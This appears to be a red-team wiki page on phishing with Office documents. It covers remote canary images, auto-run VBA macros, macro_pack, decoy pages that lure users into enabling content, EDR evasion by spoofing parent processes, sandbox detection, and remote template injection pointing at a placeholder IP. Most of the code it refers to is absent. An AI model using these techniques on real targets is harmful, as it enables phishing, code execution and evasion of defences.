Phishing - Office Documents
Word canary image
A canary image is an image in a Word document that will, whenever the document is opened in Microsoft Word
or libreoffice
, trigger a request to a remote URL.
In a Capture The Flag scenario requiring phishing, a canary image can be used to determine if the target is making use of Microsoft Word in order to pursue Word related attacks (such as office documents with macros, etc.).
The process to create a canary image in a Word .docx
document is as follow:
Insert tab -> Quick Part -> Field
Categories: "Links and References"
IncludePicture -> "File name or URL":
http://<IP>/canary.gif
Office documents with VBA macro
The OffensiveVBA
GitHub repository centralizes a number of VBA
code-snippets for code execution, sandboxes detection, persistence, etc.
Automatic macros ("auto macros")
General concept.
A number of macro names are associated with automatic execution upon realization of specific operations. The following macro names are associated by MS Office
applications to automatic execution:
Word
AutoOpen
Opening of an existing document.
Word
AutoExec
Upon start of MS Word
or loading of a global template.
Word
AutoNew
Creation of a new document.
Word
AutoClose
Closing of a document.
Word
AutoExit
Upon exit of MS Word
or unloading a global template.
Excel
Workbook_Open
Opening of the workbook.
Excel
Workbook_WindowResize(ByVal Wn As Excel.Window)
Resizing of the window of a workbook.
Excel
Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)
Before save of the workbook.
Excel
Workbook_AfterSave(ByVal Success As Boolean)
After save of the workbook.
Excel
Workbook_BeforeClose(Cancel As Boolean)
Before closing of the workbook.
Excel
Workbook_BeforePrint(Cancel As Boolean)
Before printing of the workbook.
Excel
Workbook_NewSheet(ByVal Sh As Object)
Creation of a new sheet.
Excel
Workbook_SheetActivate(ByVal Sh As Object)
Switching to a different sheet.
Excel
Workbook_SheetSelectionChange(ByVal Sh As Object, ByVal Target As Range)
Modification of a cell content.
Excel
Workbook_SheetBeforeDoubleClick(ByVal Sh As Object, ByVal Target As Range, Cancel As Boolean)
Before a double-click on a cell.
Excel
Workbook_SheetBeforeRightClick(ByVal Sh As Object, ByVal Target As Range, Cancel As Boolean)
Before a right-click on a cell.
A more comprehension list of the auto macros
supported by Excel
can be found in the official Microsoft documentation.
Automatic macro example.
The following VBA
code execute the Test
macro upon opening of the document containing the macro in MS Word
(with AutoOpen
) and MS Excel
(with Workbook_Open
):
PowerShell code in VBA macro
The following Python script transforms a PowerShell command into a multi-lines VBA string declaration. It is notably useful for long obfuscated PowerShell command that doesn't fit into a single line VBA string declaration.
As an example, the scripts produces the following output:
Automated Office documents generation with macro_pack
macro_pack
is a Python script that automatically obfuscate VBA
macros and generate documents embedding macros. A "community version" is open sourced and a "pro version", that includes additional features, can be purchased.
The following output formats are supported by macro_pack
(listed using macro_pack.exe --listformats
):
Office documents:
Excel:
.xlsm
Excel 97:
.xls
Word:
.docm
Word 97:
.doc
PowerPoint:
.pptm
Microsoft Project:
.mpp
Visio:
.vsdm
Visio97:
.vsd
Access:
.mdb
VB
formats:Visual Basic Script:
.vbs
HTML Application:
.hta
Windows Script Component:
.sct
Windows Script File:
.wsf
XSLT Stylesheet:
.xsl
Shortcuts / others formats:
Shell Link:
.lnk
Groove Shortcut:
.glk
Explorer Command File:
.scf
URL Shortcut:
.url
Settings Shortcut:
.SettingContent-ms
MS Library:
.library-ms
Setup Information:
.inf
Excel Web Query:
.iqy
(Pro version only) SYmbolic LinK:
.slk
(Pro version only) Compressed HTML Help:
.chm
Command line:
.cmd
Visual Studio Project:
.csproj
Note that MS Office
applications must be installed for the corresponding documents generation (MS Word
, MS Excel
, etc.).
Decoy document
The following VBA
code snippets, from MacroPhishing
, can be used to increase credibility of the scenario enticing the targeted user to enable the macro. The first page of the document, that can contain a message enticing macro activation, will be replaced by the second page of the document, that can be otherwise left hidden, upon activation of the macro. The second page can match the original subject / purpose of the document. Additionally, the macro automatically chooses not to save changes made to the document if the document is closed without saving. This allows the document to remain in its original state, with the first page being shown to the user and the second page hidden.
The following VBA
code should be added to the main VBA
auto-execute function:
A new class, called oAppClass
should then be created and the following code added to the class. The class can be freely renamed, as long as the instantiation from the main VBA
function (Dim oAppClass As New oAppClass
) is updated.
Spoofing the parent process and command line
Some Endpoint Detection and Response (EDR)
products may rely on processes parent-child relationship to detect and eventually block malicious macro executions. Monitoring the process creation calls can for instance be used to detect MS Office
applications spawning cmd.exe
or powershell.exe
. Processes' command line may also be scrutinized for malicious behavior.
In order to bypass EDR
products that may implement such detection and blocking mechanism, a process can be created with a spoofed parent-process and command line. The technique can be conducted as follow:
Creation of the process in a suspended state with a legitimate-looking parent process (such as
explorer.exe
) and a seemingly harmless command line. TheWin32
'sCreateProcess
API indeed supports the specification of the parent process (parameter of typeSTARTUPINFOEX
).Modification of the command line in the created process's
Process Environment Block (PEB)
to the malicious command (which will the one actually executed).Resume of the process.
VBA
macros spawning a process with a spoofed parent and command line are available in the spoofing-office-macro
GitHub repository.
Note that creation of a process in a suspended state can be identified as a malicious indicator by security products.
Another approach to break the parent-child relationship between office products and PowerShell / cmd.exe, can be to rely on the Win32_Process
WMI
class to start the process. By doing so, the child process will appear to have been started from WmiPrvSE.exe
rather than an office product. The following VBA
code snippet start a process in an hidden window:
Anti-sanboxes detection
The following VBA
code-snippet detect if the code is executed on a domain-joined computer, and exit if not. It can be used to detect if the macro is being executed in a emulated environment or sandboxe.
Remote template injection
In order to avoid embedding VBA
code in an office document and having to send a file format supporting macro (such as .doc
or .docm
), a remote template can be included in a regular .docx
file. The remote template will contain the (malicious) VBA
code and will be injected upon opening of the document in Office. In additions to making the file more resilient to static analysis, relaying on a remote template can help circumvent some dynamic analysis techniques. For instance, the template can be made available on the remote server a few minutes after sending the document, so that eventual (immediate) scanning performed by emails gateway do not access the VBA
code.
As with any VBA
macro, the execution of the macro contained in the template is conditioned by the activation of the content by the user ("Enable content"). However, upon opening of the document, HTTP
OPTIONS
, HEAD
, and GET
requests will be sent to the webserver hosting the remote template, even if the macro are not enabled.
The generation process of a DOCX
document with a remote template is as follow:
Creation of a regular
docx
document (with a template). Online templates available through Office can be used as a starting point.Changing of the
.docx
extension to.zip
.Extraction of the resulting zip archive (using
7zip
for example).Modification of the
Target
attribute (of typeattachedTemplate
) in the<DOC_NAME>\word\_rels\settings.xml.rels
file to point to the remote template. Example:Target="http://<IP>:443/Doc-template_with_macro.dotm"
Saving of the modification in the
settings.xml.rels
file, rezipping of the files into a.docx
(by zipping the subfolders and files in<DOC_NAME>\
and not the folder directly).
References
https://github.com/sevagas/macro_pack
https://docs.microsoft.com/en-us/office/vba/word/concepts/customizing-word/auto-macros
https://docs.microsoft.com/fr-fr/office/vba/api/excel.workbook
https://www.excel-pratique.com/fr/vba/evenements_classeur
https://github.com/TheKevinWang/MacroPhishing
https://github.com/christophetd/spoofing-office-macro
https://www.youtube.com/watch?v=l8nkXCOYQC4
https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/
https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html
Last updated